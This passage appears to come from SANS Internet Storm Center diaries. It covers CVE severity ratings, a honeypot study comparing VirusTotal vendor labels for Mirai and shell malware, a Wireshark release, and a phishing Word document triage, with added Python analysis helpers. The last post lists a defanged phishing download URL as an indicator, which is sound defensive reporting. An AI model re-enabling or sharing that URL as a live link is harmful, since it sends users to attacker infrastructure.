  CVE-2022-38006 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7
Windows Group Policy Elevation of Privilege Vulnerability
  CVE-2022-37955 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability
  CVE-2022-34720 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  CVE-2022-34721 | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.5
  CVE-2022-34722 | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.5
Windows Kerberos Elevation of Privilege Vulnerability
  CVE-2022-33679 | No | No | Less Likely | Less Likely | Important | 8.1 | 7.3
  CVE-2022-33647 | No | No | Less Likely | Less Likely | Important | 8.1 | 7.1
Windows Kernel Elevation of Privilege Vulnerability
  CVE-2022-37964 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
  CVE-2022-37956 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
  CVE-2022-37957 | No | No | More Likely | More Likely | Important | 7.8 | 6.8
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
  CVE-2022-30200 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Photo Import API Elevation of Privilege Vulnerability
  CVE-2022-26928 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Windows Print Spooler Elevation of Privilege Vulnerability
  CVE-2022-38005 | No | No | Unlikely | Unlikely | Important | 7.8 | 6.8
Windows Remote Access Connection Manager Information Disclosure Vulnerability
  CVE-2022-35831 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Secure Channel Denial of Service Vulnerability
  CVE-2022-30196 | No | No | Less Likely | Less Likely | Important | 8.2 | 7.1
  CVE-2022-35833 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows TCP/IP Remote Code Execution Vulnerability
  CVE-2022-34718 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5

--
Renato Marinho
Morphus Labs | LinkedIn | Twitter


Published: 2022-09-12

VirusTotal Result Comparisons for Honeypot Malware

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify them. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, is generally not considered sensitive. Malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices.
The examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that naming conventions and results differ greatly from vendor to vendor.
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

Acronis
Alibaba
APEX
BitDefenderFalx
Bkav
CMC
CrowdStrike
Cybereason
Cylance
eGambit
Endgame
F-Prot
Invincea
Kingsoft
Malwarebytes
Paloalto
Qihoo-360
SUPERAntiSpyware
SymantecMobileInsight
TACHYON
tehtris
TotalDefense
trapmine
Trustlook
VBA32
Webroot
Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:
•    73 Providers from date range 6/7/2022 – 7/31/2022
•    82 Providers from date range 6/7/2022 – 9/3/2022
That means in the last month, there has been an increase of 9 vendors, although this doesn’t consider any vendors that may have also been removed at this time.

Suggested Threat Results

VirusTotal will also give general threat classifications that can help to give a good high-level picture. 

VT Threat Classification | Count of VT Threat Classification | Percentage
trojan.shell/malkey | 5579 | 52.43%
trojan.shell/linux | 3816 | 35.86%
downloader.bash/miraia | 299 | 2.81%
downloader.shell | 277 | 2.60%
trojan.linux/mirai | 119 | 1.12%
downloader. | 118 | 1.11%
trojan.mirai/linux | 92 | 0.86%
downloader.bash/linux | 54 | 0.51%
trojan.linux/shell | 53 | 0.50%
downloader.miraia/bash | 31 | 0.29%

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots.

Results Change Over Time

We have already seen that results can differ between vendors; those vendors change, and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, and this in turn changes the information received from a variety of tools. Looking at one example, it was seen that within a 6-hour period, the number of vendors seeing a particular hash as malware increased by 13, and the threat classification from VirusTotal also changed from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity, but the creation of an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored results for a particular hash [5].
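To make that normalization step concrete, here is an added Python example (not part of the post or of its honeypot tooling) that keeps only the latest stored VirusTotal lookup per hash before counting labels, and reports the hashes whose label flipped between lookups; the stored results are constructed and the hashes are placeholders.

```python
from collections import Counter
from datetime import datetime

# Constructed sample of locally stored VirusTotal lookups:
# (hash placeholder, lookup time, suggested threat label, number of vendors flagging the file).
STORED_RESULTS = [
    ("hash-A", "2022-09-01T02:00:00", "trojan.mirai/linux", 21),
    ("hash-A", "2022-09-01T08:00:00", "trojan.linux/mirai", 34),  # same file 6 hours later: label flipped, 13 more vendors
    ("hash-B", "2022-08-20T11:30:00", "trojan.shell/malkey", 40),
    ("hash-B", "2022-08-19T09:00:00", "trojan.shell/malkey", 39),
    ("hash-C", "2022-08-25T13:00:00", "downloader.bash/miraia", 12),
    ("hash-D", "2022-08-26T15:00:00", "trojan.shell/malkey", 38),
]


def raw_classification_counts(rows):
    """Naive count over every stored lookup: a hash looked up twice is counted twice."""
    return Counter(label for _, _, label, _ in rows)


def latest_result_per_hash(rows):
    """The 'latest by date' step done with XLOOKUP in the post: newest lookup for each hash."""
    latest = {}
    for sha, ts, label, positives in rows:
        when = datetime.fromisoformat(ts)
        if sha not in latest or when > latest[sha][0]:
            latest[sha] = (when, label, positives)
    return latest


def classification_counts(rows):
    """Count suggested threat labels using only the latest lookup per hash."""
    return Counter(label for _, label, _ in latest_result_per_hash(rows).values())


def label_changes(rows):
    """Hashes whose label differs between oldest and newest lookup, with the vendor-count delta."""
    history = {}
    for sha, ts, label, positives in rows:
        history.setdefault(sha, []).append((datetime.fromisoformat(ts), label, positives))
    changes = {}
    for sha, lookups in history.items():
        lookups.sort()  # chronological; tuples sort on the datetime first
        first, last = lookups[0], lookups[-1]
        if first[1] != last[1]:
            changes[sha] = {
                "from": first[1],
                "to": last[1],
                "positives_delta": last[2] - first[2],
                "hours": (last[0] - first[0]).total_seconds() / 3600,
            }
    return changes


if __name__ == "__main__":
    print("raw counts:       ", dict(raw_classification_counts(STORED_RESULTS)))
    print("normalized counts:", dict(classification_counts(STORED_RESULTS)))
    for sha, change in label_changes(STORED_RESULTS).items():
        print(sha, change)
```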

Different Provider Comparisons

So far, this has only focused on suggested classifications from VirusTotal. The naming of these threats from the various vendors also differs quite a bit and we see a much different number of results.

Provider | Number of Results | No Classification | Provider Data Not Available | Total
Avast | 1273 | 519 | 0 | 1792
AVG | 1273 | 34 | 485 | 1792
GData | 1201 | 591 | 0 | 1792
DrWeb | 1151 | 641 | 0 | 1792
MicroWorld-eScan | 1132 | 660 | 0 | 1792
Ad-Aware | 1130 | 662 | 0 | 1792
BitDefender | 1128 | 664 | 0 | 1792
FireEye | 1117 | 675 | 0 | 1792
Emsisoft | 1079 | 695 | 18 | 1792
ALYac | 1030 | 762 | 0 | 1792
Ikarus | 1021 | 771 | 0 | 1792
AhnLab-V3 | 971 | 821 | 0 | 1792
TrendMicro | 942 | 850 | 0 | 1792
TrendMicro-HouseCall | 941 | 851 | 0 | 1792
CAT-QuickHeal | 915 | 877 | 0 | 1792
Kaspersky | 796 | 996 | 0 | 1792
Comodo | 775 | 1017 | 0 | 1792
Arcabit | 756 | 1036 | 0 | 1792
Lionic | 714 | 1078 | 0 | 1792
Avira | 701 | 1091 | 0 | 1792
VIPRE | 692 | 262 | 838 | 1792
Cynet | 686 | 1077 | 29 | 1792
ESET-NOD32 | 628 | 1164 | 0 | 1792
MAX | 622 | 1170 | 0 | 1792
Tencent | 562 | 1230 | 0 | 1792
Microsoft | 533 | 1257 | 2 | 1792
Fortinet | 524 | 1239 | 29 | 1792
Cyren | 523 | 1269 | 0 | 1792
Rising | 517 | 1275 | 0 | 1792
McAfee-GW-Edition | 501 | 1290 | 1 | 1792
Sophos | 496 | 1284 | 12 | 1792
McAfee | 486 | 1305 | 1 | 1792
Sangfor | 458 | 1158 | 176 | 1792
Symantec | 422 | 1039 | 331 | 1792
NANO-Antivirus | 405 | 1387 | 0 | 1792
ZoneAlarm | 305 | 1478 | 9 | 1792
Google | 188 | 60 | 1544 | 1792
F-Secure | 155 | 1637 | 0 | 1792
Antiy-AVL | 121 | 890 | 781 | 1792
ClamAV | 107 | 1671 | 14 | 1792
SentinelOne | 94 | 1698 | 0 | 1792
Elastic | 74 | 1707 | 11 | 1792
MaxSecure | 72 | 1710 | 10 | 1792
Jiangmin | 71 | 1721 | 0 | 1792
Avast-Mobile | 70 | 1722 | 0 | 1792
BitDefenderTheta | 59 | 1729 | 4 | 1792
Zillya | 56 | 1736 | 0 | 1792
VirIT | 51 | 1726 | 15 | 1792
ViRobot | 48 | 1744 | 0 | 1792
Gridinsoft | 23 | 1758 | 11 | 1792
Yandex | 22 | 1770 | 0 | 1792
Baidu | 7 | 1785 | 0 | 1792
Panda | 5 | 1780 | 7 | 1792
K7AntiVirus | 2 | 1790 | 0 | 1792
K7GW | 2 | 1790 | 0 | 1792
CMC | 0 | 995 | 797 | 1792
TACHYON | 0 | 1792 | 0 | 1792
Malwarebytes | 0 | 1774 | 18 | 1792
Trustlook | 0 | 1792 | 0 | 1792
Zoner | 0 | 1792 | 0 | 1792
BitDefenderFalx | 0 | 1781 | 11 | 1792
TotalDefense | 0 | 11 | 1781 | 1792
eGambit | 0 | 14 | 1778 | 1792
Kingsoft | 0 | 1783 | 9 | 1792
Acronis | 0 | 1792 | 0 | 1792
Invincea | 0 | 11 | 1781 | 1792
CrowdStrike | 0 | 1792 | 0 | 1792
F-Prot | 0 | 11 | 1781 | 1792
VBA32 | 0 | 1792 | 0 | 1792
APEX | 0 | 1792 | 0 | 1792
tehtris | 0 | 1777 | 15 | 1792
SUPERAntiSpyware | 0 | 1792 | 0 | 1792
Webroot | 0 | 1792 | 0 | 1792
SymantecMobileInsight | 0 | 1792 | 0 | 1792
Qihoo-360 | 0 | 11 | 1781 | 1792
Cybereason | 0 | 1671 | 121 | 1792
Endgame | 0 | 11 | 1781 | 1792
Alibaba | 0 | 1792 | 0 | 1792
Bkav | 0 | 1792 | 0 | 1792
Trapmine | 0 | 1746 | 46 | 1792
Paloalto | 0 | 1792 | 0 | 1792
Cylance | 0 | 1787 | 5 | 1792

The end of this list also highlights the vendors that did not have any results. Looking at some of the most popular providers, we also see a difference in the naming of threats.

Avast Result | Count | VirusTotal Suggested Threats
Other:Malware-gen [Trj] | 517 | trojan.shell/linux, trojan.shell/malkey, trojan.linux/bruteforce, trojan.linux/shell, trojan.linux/bash, trojan.linux/sshbru, trojan.linux
BV:Downloader-AAN [Drp] | 185 | downloader.linux, trojan.linux/shell, downloader.bash/linux, downloader.bash/miraia, downloader.linux/bash, downloader.linux/shell
BV:Downloader-AEH [Drp] | 146 | downloader.miraia/bash, trojan.linux/mirai, downloader.linux, downloader.gen2, downloader.bash/linux, downloader., downloader.shell, downloader.bash/miraia
BV:Agent-BAP [Trj] | 97 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
BV:Downloader-II [Trj] | 93 | trojan.shell/vsntcg22, downloader., downloader.jvhi/shell, downloader.shell, downloader.shell/linux
BV:Downloader-OJ [Drp] | 78 | trojan.shell, downloader.shell, trojan.shell/gen2
ELF:Mirai-BOD [Trj] | 25 | trojan.mirai/linux, trojan.linux/mirai
ELF:Xorddos-AB [Trj] | 23 | trojan.linux/xorddos
BV:Downloader-APV [Drp] | 19 | downloader.bash/miraib, downloader.miraib/bash
ELF:Miner-KC [Trj] | 19 | trojan.linux, trojan.linux/uselvhs22, trojan.linux/multiverze, trojan.linux/tygpz
BV:Downloader-APK [Drp] | 17 | downloader.bash/miraib, trojan.linux/shell, downloader.shell/bashdlod, downloader.miraib/bash
ELF:BitCoinMiner-HF [Trj] | 9 | miner.linux/camelot
ELF:Mirai-ADP [Trj] | 9 | trojan.mirai/linux, trojan.linux/mirai
ELF:Mirai-AHC [Trj] | 5 | trojan.linux/mirai
Perl:IRCBot-AD [Trj] | 4 | ircbot/perl
Perl:IRCBot-D [Trj] | 4 | trojan.perl/shellbot
ELF:Mirai-ARL [Trj] | 4 | trojan.linux/gafgyt
ELF:Mirai-BWY [Trj] | 4 | trojan.mirai/linux
BV:Downloader-AMZ [Drp] | 4 | trojan.shell/smlbr, trojan.smlbr/shell
ELF:Mirai-AAJ [Trj] | 3 | trojan.mirai/linux
Perl:Shellbot-O [Trj] | 2 | trojan.perl/shellbot
ELF:Mirai-BXS [Trj] | 2 | trojan.mirai/linux
ELF:MiraiDownloader-MX [Trj] | 1 | trojan.linux/mirai
ELF:Goldfishgang-A [Bot] | 1 | trojan.mirai/linux
ELF:Mirai-APD [Trj] | 1 | trojan.mirai/linux
ELF:MiraiDownloader-MR [Drp] | 1 | downloader.linux/mirai

Avast and AVG have the same results and numbers, although this is likely due to Avast acquiring AVG in 2016 [6].

GData Result | Count | VirusTotal Suggested Threats
Trojan.Shell.Agent.V | 452 | trojan.shell/linux, trojan.shell/malkey
Trojan.Shell.Agent.U | 100 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
Script.Trojan.Agent.Q2DN10 | 73 | downloader., downloader.shell, downloader.shell/linux
Trojan.GenericKD.39794855 | 56 | trojan.shell
Trojan.GenericKD.50084125 | 32 | trojan., trojan.linux/bruteforce, trojan.linux/shell, trojan.linux/sshbru, trojan.linux
Linux.Trojan.Mirai.B | 29 | trojan.mirai/linux, trojan.linux/mirai
Linux.Application.CoinMiner.AH (2x) | 20 | trojan.linux/shell, trojan.linux/bash
Script.Trojan.Agent.SLJ1UA | 20 | trojan.shell, trojan.shell/gen2
Trojan.Linux.GenericKD.39722060 | 15 | trojan.linux/multiverze, trojan.linux/tygpz
Trojan.Downloader.JVHI | 13 | downloader.jvhi/shell
Trojan.Linux.Generic.208033 | 12 | trojan.linux/xorddos
Generic.Bash.MiraiA.30F5F415 | 11 | downloader.bash/miraia
Trojan.Linux.GenericA.73252 | 11 | trojan.linux/xorddos
Generic.Bash.MiraiB.CB1F6D93 | 10 | downloader.miraib/bash
Script.Trojan.Agent.Z0E85G | 10 | downloader.shell/bashdlod, trojan.linux/shell
Generic.Bash.MiraiA.1042638E | 9 | downloader.miraia/bash
Trojan.Linux.Generic.261801 | 8 | trojan.linux/shell
Generic.Bash.MiraiA.FC226613 | 8 | downloader.bash/linux
Trojan.Linux.GenericKD.40003689 | 8 | trojan.linux, trojan.linux/uselvhs22
Generic.Bash.MiraiA.37E69EBB | 7 | downloader.bash/miraia
Generic.Bash.MiraiA.9FE00F4A | 7 | downloader.bash/miraia
Generic.Bash.MiraiA.F71C9D36 | 7 | downloader.bash/miraia
Generic.Bash.MiraiB.43209CEF | 7 | downloader.miraib/bash
Generic.Bash.MiraiA.C840B7CF | 6 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.B7AF6546 | 6 | downloader.bash/miraia
Generic.Bash.MiraiA.76F02707 | 6 | downloader.bash/miraia
Trojan.GenericKD.61105047 | 6 | trojan.linux/shell
Trojan.Linux.Agent.IOS | 5 | trojan.linux/mirai
Backdoor.Perl.Shellbot.F | 5 | trojan.perl/shellbot
Generic.Bash.MiraiA.F31D7395 | 5 | downloader.bash/miraia
Trojan.GenericKD.50646874 | 5 | trojan.
Trojan.Linux.GenericKD.49342126 | 5 | trojan.linux/mirai
Generic.Bash.MiraiA.53DA044C | 5 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.CDE0B287 | 5 | downloader.bash/linux
Generic.Bash.MiraiA.5A5455F1 | 5 | downloader.bash/miraia
Trojan.GenericKD.46067161 | 4 | trojan.linux
Trojan.GenericKD.46077164 | 4 | trojan.linux/shell
Trojan.GenericKD.48821331 | 4 | trojan.
Trojan.GenericKD.39722073 | 4 | trojan.linux
Application.Linux.Generic.9905 | 4 | trojan.linux/gafgyt
Generic.Bash.MiraiA.2B19920F | 4 | downloader.miraia/bash
Generic.Bash.MiraiA.AB3356B6 | 4 | downloader.linux/bash
Generic.Bash.MiraiA.90D485C3 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.1BB22156 | 4 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.77A820C1 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.9F225672 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.C00C7246 | 4 | downloader.bash/linux
Generic.Bash.MiraiA.261F2800 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.91B96D6D | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.8525AE6B | 4 | downloader.bash/miraia
Generic.Bash.MiraiB.81B3B899 | 4 | trojan.miraib/bash
Generic.Bash.MiraiA.42A992E0 | 4 | downloader.bash/miraia, downloader.linux/bash
Linux.Trojan.Agent.FRYE0V | 3 | trojan.mirai/linux
Generic.Bash.MiraiB.EB588E65 | 3 | downloader.miraib/bash
Generic.Bash.MiraiA.F4E0D44D | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.9FAC84B8 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.42844671 | 3 | downloader.bash/miraia
Trojan.GenericKD.50084126 | 3 | trojan.linux/shell
Linux.Trojan.Mirai.E | 3 | trojan.mirai/linux
Trojan.Linux.Mirai.GDC | 3 | trojan.linux/mirai
Generic.Bash.MiraiA.49306ADF | 3 | downloader.linux/bash
Generic.Bash.MiraiA.F9E49AE2 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.87330CC0 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.A6961F86 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.29E60E32 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.1DCA368B | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.32EA1F82 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.370A6145 | 3 | downloader.bash/linux
Generic.Bash.MiraiA.88F9FED5 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.A6CEE47A | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.6215B474 | 3 | downloader.miraia/bash
Generic.Bash.MiraiA.BF170979 | 3 | downloader.linux/bash, downloader.bash/linux
Linux.Application.CoinMiner.AH | 3 | trojan.linux/sshbru
Generic.Bash.MiraiA.8991856A | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.D4BA1004 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.EE96A6CC | 3 | downloader.bash/miraia
Generic.Bash.MiraiB.C122DEF0 | 2 | trojan.miraib/bash
Linux.Trojan.Agent.21WIPQ | 2 | trojan.linux/mirai
Script.Trojan.Agent.D34HUR | 2 | downloader.linux
Backdoor.Perl.Shellbot.B | 2 | trojan.perl/shellbot
Generic.Bash.MiraiA.19B73922 | 2 | downloader.miraia/bash
Generic.Bash.MiraiA.F9CC4608 | 2 | downloader.linux/bash, downloader.bash/linux
Generic.Bash.MiraiA.E2FF41E4 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.F384FF05 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.03BF947A | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.D2936D49 | 2 | downloader.bash/miraia
Script.Trojan.Agent.XQDCBP | 2 | downloader.linux/shell
Trojan.Linux.GenericKD.49319781 | 2 | trojan.linux/mirai
Generic.Bash.MiraiA.AFC860A3 | 2 | downloader.bash/miraia
Linux.Trojan.Agent.71ZXJT | 2 | trojan.linux/mirai
Generic.Bash.MiraiA.0A4B5647 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.3085EB19 | 2 | downloader.bash/linux
Generic.Bash.MiraiA.C8C8B46F | 2 | downloader.linux/bash
Generic.Bash.MiraiA.E0206CAA | 2 | downloader.miraia/bash
Generic.Bash.MiraiA.AFD545E8 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.9DFBA98D | 2 | downloader.bash/linux
Generic.Bash.MiraiA.77508253 | 2 | downloader.bash/miraia
Trojan.Linux.Generic.266531 | 2 | trojan.linux/shell
Generic.Bash.MiraiA.999DC364 | 2 | downloader.bash/miraia
Generic.Bash.MiraiB.C388CEE8 | 1 | downloader.miraib/bash
Trojan.Linux.Generic.258109 | 1 | trojan.linux/mirai
Generic.Bash.MiraiB.9F77C950 | 1 | downloader.miraib/bash
Gen:Variant.Trojan.Linux.Mirai.8 | 1 | trojan.mirai/linux
Trojan.GenericKD.48821326 | 1 | trojan.linux
Trojan.Linux.Generic.207109 | 1 | trojan.linux/shell
Generic.Bash.MiraiA.F7E66D30 | 1 | downloader.bash/miraia
Linux.Trojan.Agent.0JQTA6 | 1 | trojan.linux/mirai
Generic.Bash.MiraiA.6AB1054A | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.E4FF83F6 | 1 | downloader.bash/miraia
Linux.Trojan.Mirai.J | 1 | trojan.mirai/linux
Generic.Bash.MiraiA.06015B18 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.716695BA | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.CA694A08 | 1 | downloader.bash/linux
Generic.Bash.MiraiA.7D12497D | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.24330190 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.7AD1CA92 | 1 | downloader.bash/linux
Generic.Bash.MiraiA.9A967DD3 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.A3F75002 | 1 | downloader.linux/bash
Generic.Bash.MiraiB.83D16FFF | 1 | downloader.bash/miraib
Generic.Bash.MiraiA.7176EFCA | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.BBDDAFB3 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.9C2BFED6 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.27A5FB7E | 1 | downloader.bash/miraia
Generic.Bash.MiraiB.A8550CC8 | 1 | downloader.bash/miraib
Script.Trojan.Agent.SSSDZG | 1 | trojan.shell/smlbr

Microsoft Result | Count | VirusTotal Suggested Threats
TrojanDownloader:Linux/Morila!MTB | 118 | trojan.linux/shell, downloader.bash/linux, downloader.bash/miraia, downloader.linux/bash, downloader.linux/shell
Backdoor:Linux/IRCbot.YA!MTB | 95 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
Trojan:Linux/Multiverze | 58 | trojan.linux/uselvhs22, trojan.linux/mirai, trojan.linux/tygpz, trojan.mirai/linux, trojan.linux/multiverze
TrojanDownloader:Linux/Morila.B!MTB | 57 | downloader.bash/miraia, downloader.bash/linux
TrojanDownloader:Linux/ShWg.YB!MTB | 54 | downloader.bash/miraia, trojan.linux/shell, downloader.bash/linux
Trojan:Script/Wacatac.B!ml | 40 | downloader.bash/miraib, trojan.miraib/bash, trojan.mirai/linux, downloader.miraib/bash
HackTool:Linux/Sshbru!MTB | 26 | trojan.linux/shell, trojan.linux, trojan.linux/sshbru
DoS:Linux/Xorddos.A | 23 | trojan.linux/xorddos
Trojan:Linux/CoinMiner!rfn | 16 | trojan.linux/shell
Trojan:Linux/CoinMiner.N!MTB | 9 | miner.linux/camelot
HackTool:Linux/Sshbru!rfn | 8 | trojan.linux/shell, trojan.linux/sshbru, trojan.linux/bruteforce
Backdoor:Linux/Mirai.BO!MTB | 6 | trojan.linux/mirai, linux
Trojan:Win32/Occamy.CAD | 4 | trojan.linux
Backdoor:HTML/Derflop.A | 4 | trojan.perl/shellbot
Backdoor:Linux/Gafgyt.A!MTB | 4 | trojan.linux/gafgyt
Trojan:Unix/Multiverze | 3 | trojan.linux/shell
Trojan:Linux/Mirai.AB!MTB | 2 | downloader.bash/miraia
Trojan:Linux/Downldr.AE!MTB | 2 | downloader.bash/miraia
Backdoor:Linux/Mirai.AN!xp | 1 | trojan.mirai/linux
Trojan:Linux/ZkarletFlash | 1 | trojan.mirai/linux
Backdoor:Linux/Mirai.AW!MTB | 1 | trojan.mirai/linux
TrojanDownloader:Linux/Mirai.C!MTB | 1 | downloader.linux/mirai

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 


Published: 2022-09-11

Wireshark 3.6.8 and 4.0.0rc1 Released

Wireshark version 3.6.8 was released. It fixes 1 vulnerability and 15 bugs.

The vulnerability is an infinite loop in the F5 Ethernet Trailer dissector.

And the first release candidate for Wireshark 4.0.0 was also released.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-10

Phishing Word Documents with Suspicious URL

Got this Word document this week that was quarantined as phishing by Defender (223341099.docx), with the subject "Urgent Payment Issue". Using Didier's malware analysis tools [1], I ran through the following checks to see what could be embedded in it that is likely suspicious. I first checked the file using oledump.py to see if there were any OLE files in this document.



Next step was to check what is inside this OPC file using zipdump.py. 


 

There is one JPEG file in there and the remainder are all XML, all dated September 1, 2022. Since everything appears to be in word/document.xml, let's look for URLs that might be hidden in this Word document by digging inside with zipdump.py, using the options described by Didier here [2].

 

One interesting URL was located in the document. re-search, with the -e option, searches inside the text and extracted the string. My last step is to dump the content of item #4 to see all the other URLs, including the one previously identified:

 


Indicator

qaz[.]im
https://qaz[.]im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6
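As an added illustration of the same triage (not code from the diary or from Didier's tools), the Python below builds a constructed minimal OPC package standing in for the quarantined .docx, lists its parts the way a zipdump.py listing does, pulls URLs out of the XML parts while ignoring the standard OOXML schema namespaces, and defangs what is left. The host example.invalid and the paths are constructed placeholders.

```python
import io
import re
import zipfile
from urllib.parse import urlsplit

URL_RE = re.compile(r'''https?://[^\s"'<>]+''')
# Namespace URIs that every Office Open XML package carries; they are not indicators.
BENIGN_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def build_sample_docx() -> bytes:
    """Constructed minimal OPC package standing in for the quarantined file (not the real sample).
    Host and paths in the URLs are placeholders."""
    parts = {
        "[Content_Types].xml": '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/document.xml": (
            '<?xml version="1.0"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:body>'
            '<w:p><w:hyperlink r:id="rId2"><w:r><w:t>View your invoice</w:t></w:r></w:hyperlink></w:p>'
            '<w:p><w:r><w:t>Questions? https://example.invalid/support</w:t></w:r></w:p>'
            '</w:body></w:document>'),
        # External hyperlink targets live in the relationships part, not in document.xml itself.
        "word/_rels/document.xml.rels": (
            '<?xml version="1.0"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            'Target="https://example.invalid/load/constructed-id" TargetMode="External"/></Relationships>'),
        "word/media/image1.jpeg": b"\xff\xd8\xff\xe0 constructed JPEG stub",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


def list_parts(docx_bytes: bytes):
    """Inventory of the package members (name, uncompressed size), like a zipdump.py listing."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return [(info.filename, info.file_size) for info in zf.infolist()]


def extract_urls(docx_bytes: bytes):
    """URLs found in every XML/rels part, minus the standard schema namespaces."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue  # binary parts such as the JPEG are not searched
            text = zf.read(info.filename).decode("utf-8", errors="replace")
            for url in URL_RE.findall(text):
                if (urlsplit(url).hostname or "") not in BENIGN_HOSTS:
                    found.add(url)
    return sorted(found)


def defang(url: str) -> str:
    """Write the host with [.] so the indicator cannot be clicked, as in the list above."""
    host = urlsplit(url).hostname or ""
    return url.replace(host, host.replace(".", "[.]"), 1) if host else url


if __name__ == "__main__":
    sample = build_sample_docx()
    for name, size in list_parts(sample):
        print(f"{size:6d}  {name}")
    for url in extract_urls(sample):
        print("URL:", defang(url))
```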

 

[1] https://github.com/DidierStevens/DidierStevensSuite
[2] https://isc.sans.edu/diary/Analyzing+a+Phishing+Word+Document/28562
